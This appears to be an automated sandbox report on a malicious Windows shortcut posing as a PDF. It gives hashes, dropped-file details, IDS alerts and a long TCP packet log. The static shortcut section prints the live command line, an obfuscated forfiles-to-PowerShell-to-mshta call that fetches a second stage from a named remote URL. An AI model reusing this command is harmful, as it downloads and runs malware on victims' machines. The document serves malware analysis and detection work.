                                                                                        Preview:%PDF-1.3.3 0 obj.<</Type /Page./Parent 1 0 R./Resources 2 0 R./Contents 4 0 R>>.endobj.4 0 obj.<</Filter /FlateDecode /Length 879>>.stream.x.}TM..:...+..U...?...P..+.(H...bO....$%..{f.8N..'.F...3...*.e..W..x.1...I...|X.4iD.B.".a.../f@0+....{.^9...(.Tk....k..4Hx4.U........3H..#.U.."..H...V$.k....HO ]... .....X.J<.......{...^&V.5|..:....z:....j2.7. .n.....=QA......ai..<H....|...#?.]............H...W%Y..{.k....CY)Xg>$....v.b.+c.o....),.6.E........>..>.Rk..~..n.I...].k........V...G.d...B..v.Ri......Or.....E*)sylC.....${.v.\ .*.**.\...#..a&pP~.Q.G92..WJ#t.Pf.....,.]..n..)../.a0...<.$...a..|&...O.Y-....N.=..R..3M.&D..a...j....>!..ZJ..G.c...yc..x.....7w......d.E.....j....|.E&.X.Q.,J>..)......7.%Z...9u....K7...\u.#FA..l.......C.@...N..^.e]dM).8}...|.cV...3....>..V....ufq....r..w-....,HU]..e.h.. .4.....8j....c.....?..L.t.c.f..i..$.{..I".vRc..[..\.............v..]..^.<MKQL..+......4...v...I\..6 ..H.........t...............^n.!O.\..>.o./.QW'....~.

                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:09:57 2019, mtime=Sun Dec 15 06:39:19 2024, atime=Sat Dec 7 08:09:57 2019, length=41472, window=hidenormalshowminimized
                                                                                        Entropy (8bit):2.630468671046308
                                                                                        TrID:
                                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                                        File name:s4PymYGgSh.lnk
                                                                                        File size:3'068 bytes
                                                                                        MD5:f2d11d2f41fe0c5b667ddc0cdde9b149
                                                                                        SHA1:56401fcd09bc96c694ed3c7dd5ad94733cd747ae
                                                                                        SHA256:8c5195f5d2c6f618d5f98a9f32809b5da490cb1c48512d410c1896695fb4d394
                                                                                        SHA512:dc21371dd82f7b58b095f3de221bf470c47b9ffc0515710e18611ac6aa66a1be332e1ecfca9124bd468a59f02d993770bb254835559b7b2eb0eff5adbc7ce9f1
                                                                                        SSDEEP:24:8WXvfY3tn+pyAMkr+/4W+4MlEPSL6KS2iOHLSHFacabqyI+pu4m:8Wo3CQ/MlEQ6KRi4Gacaey3w4
                                                                                        TLSH:BA51D30422F95B74E3B7AB792879F20289717896DC12DF1E009451C818A5A20FAB5F7B
                                                                                        File Content Preview:L..................F.@.. ............%Zs.N..................................E....P.O. .:i.....+00.../C:\...................V.1......YI...Windows.@........OwH.Yx<....(.....................R3..W.i.n.d.o.w.s.....Z.1......Y....System32..B........OwH.Y.7......

                                                                                        File Icon

                                                                                        Icon Hash:74f0e4e4e4e1e1ed

                                                                                        Static Windows Shortcut Info

                                                                                        General

                                                                                        Relative Path:..\..\..\Windows\System32\forfiles.exe
                                                                                        Command Line Argument:/p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo
                                                                                        Icon location:C:\Users\Administrator\Downloads\Telegram Desktop\file_type_pdf_icon_130274.ico

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-18T20:55:34.443305+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749742147.45.49.15580TCP
                                                                                        2024-12-18T20:55:34.713269+01002833022ETPRO MALWARE Possible Malicious Second Stage Download with Terse Headers1147.45.49.15580192.168.2.749742TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 18, 2024 20:55:23.900435925 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:23.900470018 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:23.900729895 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:23.915628910 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:23.915646076 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:25.466016054 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:25.466089010 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:25.537518978 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:25.537558079 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:25.537976027 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:25.538036108 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:25.540446997 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:25.583381891 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.084259987 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.084361076 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.276560068 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.276573896 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.276592970 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.276681900 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.276681900 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.276712894 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.276766062 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.328974962 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.329005003 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.329077959 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.329112053 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.329140902 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.329178095 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.471415043 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.471443892 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.471510887 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.471538067 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.471555948 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.471642017 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.502782106 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.502808094 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.502923965 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.502945900 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.503000975 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.503525972 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523441076 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.523480892 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.523524046 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523550987 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.523569107 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523602009 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.523605108 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523649931 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523961067 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523972988 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:32.063685894 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:32.183228016 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:32.183341026 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:32.184206009 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:32.303775072 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:33.576278925 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:33.576478958 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:33.576525927 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:33.576828957 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:33.576843977 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:33.576937914 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:33.975336075 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.095366001 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.443155050 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.443226099 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.443305016 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.443665028 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.443679094 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.443747044 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.444499016 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.444513083 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.444658041 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.446285963 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.446494102 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.446568966 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.454858065 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.455074072 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.455199957 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.465018988 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.467096090 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.467171907 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.593902111 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.594109058 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.594197989 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.598329067 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.598758936 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.598834038 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.635337114 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.635518074 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.635587931 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.637715101 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.638041019 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.638098001 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.646305084 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.646496058 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.646646976 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.654532909 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.655070066 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.655333996 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.662949085 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.663117886 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.663193941 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.671253920 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.671653986 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.671853065 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.679634094 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.679912090 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.679989100 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.688185930 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.690216064 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.690289974 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.697149038 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.697411060 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.697495937 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.704730988 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.704969883 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.705032110 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.713268995 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.744767904 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.744827032 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.746184111 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.749087095 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.749178886 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.787527084 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.787766933 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.787892103 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.791794062 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.791935921 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.792181969 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.800393105 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.800746918 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.800854921 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.808512926 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.809931993 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.809974909 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.829135895 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.829242945 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.829333067 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.832493067 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.833211899 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.833394051 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.839168072 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.839371920 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.839517117 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.845582008 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.845860958 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.846000910 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.852322102 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.852564096 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.852637053 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.859589100 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.859800100 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.859879971 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.866494894 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.866668940 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.866898060 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.872687101 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.873102903 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.873224020 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.879193068 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.879518032 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.879561901 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.883881092 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.884147882 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.884298086 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.888236046 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.888875008 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.888968945 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.892651081 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.892781973 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.892833948 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.897042036 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.897169113 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.897372961 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.901422977 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.901839018 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.901973009 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.905780077 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.905992985 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.906225920 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.910274029 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.911149025 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.911331892 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.914727926 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.914877892 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.915108919 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.919106960 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.919323921 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.919446945 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.923438072 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.923804045 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.923858881 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.927858114 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.928065062 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.928241014 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.932703972 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.949059963 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.949131012 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.949270010 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.951355934 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.951455116 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.951577902 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.955593109 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.955703020 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.986040115 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.986381054 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.986440897 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.988223076 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.989013910 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.989100933 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.993318081 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.993607998 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.993664980 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.998437881 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.998549938 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.998611927 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.024705887 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.025470018 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.025544882 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.026247025 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.026515961 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.026575089 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.029109955 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.030185938 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.030242920 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.030555010 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.033227921 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.033291101 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.033437014 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.036123991 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.036175013 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.036439896 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.039230108 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.039321899 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.039582968 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.042078018 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.042190075 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.042321920 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.045053959 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.045113087 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.045398951 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.047421932 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.047501087 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.047894955 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.049665928 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.049729109 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.050900936 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.051712990 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.051779032 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.052028894 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.054121971 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.054172039 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.054193974 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.056046009 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.056138992 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.056237936 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.058577061 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.058626890 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.058949947 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.060525894 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.060599089 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.060760975 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.062576056 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.062640905 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.063175917 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.064733982 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.064871073 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.064940929 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.066867113 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.066951990 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.067399025 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.069467068 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:35.069540977 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:35.069637060 CET8049742147.45.49.155192.168.2.7
